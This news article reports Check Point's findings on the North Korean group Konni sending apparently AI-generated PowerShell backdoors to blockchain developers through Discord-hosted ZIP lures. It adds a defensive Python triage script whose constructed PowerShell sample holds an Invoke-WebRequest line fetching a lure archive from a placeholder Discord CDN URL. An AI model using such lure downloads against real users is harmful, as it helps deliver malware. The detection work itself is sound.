North Koreans now using AI-generated PowerShell backdoor to target devs

Konni, a North Korean threat actor, has been using PowerShell malware generated using AI tools to attack developers and engineering teams in the blockchain sector. The phishing campaign has targeted users in Japan, Australia, and India.
According to Check Point Research, Konni’s malicious activity goes beyond its typical focus area, indicating broader targeting across the Asia-Pacific region. The hacking group usually attacks organizations in South Korea, Russia, Ukraine, and Europe.
The campaign targets software developers and engineering teams with expertise in, or access to, blockchain-related resources and infrastructure. Konni uses lure content designed to look like legitimate project documentation, often tied to blockchain and crypto initiatives.
More specifically, the campaign leverages ZIP files mimicking project requirements-themed documents hosted on Discord’s content delivery network to unleash a multi-stage attack chain.
The lure documents include technical details such as architecture, technology stacks, development timelines, and in some cases, budgets and delivery milestones.
“This pattern suggests an intent to compromise development environments, thereby obtaining access to sensitive assets, including infrastructure, API credentials, wallet access, and ultimately cryptocurrency holdings,” said the researchers in a technical report.
The payload of this chain is an AI-generated PowerShell backdoor. The script is unusually polished in structure, but embedded directly in the code is the comment: “# <– your permanent project UUID.”
“This phrasing is highly characteristic of LLM-generated code, where the model explicitly instructs a human user on how to customize a placeholder value. Such comments are commonly observed in AI-produced scripts and tutorials,” Check Point explains.
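As an added illustration, not code from Check Point's report or from the campaign itself, the following Python triage script applies the two indicators described above to a PowerShell file: comment lines in which the code's author tells a human which placeholder to customise, and lure archives fetched from Discord's content delivery network. The sample script, the broader comment phrasings beyond the one quoted in the report, and the CDN hostname cdn.discordapp.com are assumptions of the example.

```python
"""Triage heuristics for PowerShell scripts (added example, not Check Point's code).

Flags LLM-style placeholder-instruction comments and Discord CDN download
URLs. Everything below is constructed for illustration.
"""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# Comment lines in which the author instructs a human reader which value to
# customise. The first pattern matches the style quoted in the report
# ("# <-- your permanent project UUID"; the page renders the arrow with an
# en dash, so both "-" and "–" are accepted). The other two are assumed
# generalisations of common LLM phrasing, not patterns taken from the report.
PLACEHOLDER_PATTERNS = [
    re.compile(r"#\s*<[-–]+\s*your\b", re.IGNORECASE),
    re.compile(r"#.*\b(replace|set|insert|paste)\b.*\bwith\s+your\b", re.IGNORECASE),
    re.compile(r"#.*\byour\s+\w+(?:\s+\w+)?\s+(?:goes\s+)?here\b", re.IGNORECASE),
]

# Hostname assumed for Discord's content delivery network; the report only
# says the ZIP lures were hosted on "Discord's content delivery network".
DISCORD_CDN = re.compile(r"""https?://cdn\.discordapp\.com/[^\s"')]+""", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    line_no: int
    kind: str        # "llm_placeholder" or "discord_cdn_url"
    evidence: str    # the offending line or URL


def scan_powershell(source: str) -> list[Finding]:
    """Return one Finding per indicator hit, in line order."""
    findings: list[Finding] = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        if any(p.search(line) for p in PLACEHOLDER_PATTERNS):
            findings.append(Finding(line_no, "llm_placeholder", line.strip()))
        for match in DISCORD_CDN.finditer(line):
            findings.append(Finding(line_no, "discord_cdn_url", match.group(0)))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count hits per indicator kind, e.g. {'llm_placeholder': 1, ...}."""
    return dict(Counter(f.kind for f in findings))


# Constructed sample modelled on the report's description; not the real script.
SAMPLE_SCRIPT = r"""
# constructed sample: polling skeleton with a placeholder comment and a lure download
$ProjectId = "00000000-0000-0000-0000-000000000000"   # <-- your permanent project UUID
$Interval  = 300                                       # poll interval in seconds
$Lure = "https://cdn.discordapp.com/attachments/111111/222222/Project_Requirements.zip"
Invoke-WebRequest -Uri $Lure -OutFile "$env:TEMP\Project_Requirements.zip"
Write-Output "fetched"
"""

if __name__ == "__main__":
    hits = scan_powershell(SAMPLE_SCRIPT)
    for f in hits:
        print(f"line {f.line_no}: {f.kind}: {f.evidence}")
    print(summarize(hits))
```

Run against the sample, the scanner reports the placeholder comment on line 3 and the CDN URL on line 5. Neither indicator is proof of malice on its own (tutorial scripts carry the same comments, and Discord links are common in developer chat), so the output is meant to prioritise files for analyst review rather than to block anything automatically.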
All this, say the researchers, highlights the growing use of AI by threat actors, including, of course, North Korean groups.
“Instead of focusing on individual end-users, the campaign goal seems to be to establish a foothold in development environments, where compromise can provide broader downstream access across multiple projects and services,” Check Point said.
“The introduction of AI-assisted tooling suggests an effort to accelerate development and standardize code while continuing to rely on proven delivery methods and social engineering.”
Active since at least 2014, the group typically relies on spear-phishing to deliver weaponized documents themed around geopolitical issues and activity on the Korean Peninsula.
Konni is best known for targeting organizations and individuals in South Korea, with a focus on diplomatic channels, international relations, NGOs, academia, and government. It’s also tracked as Earth Imp, Opal Sleet, Osmium, TA406, and Vedalia.
In November, Konni was found targeting Android devices by exploiting Google’s asset-tracking service, Find Hub, to remotely reset victims' devices and erase their personal data.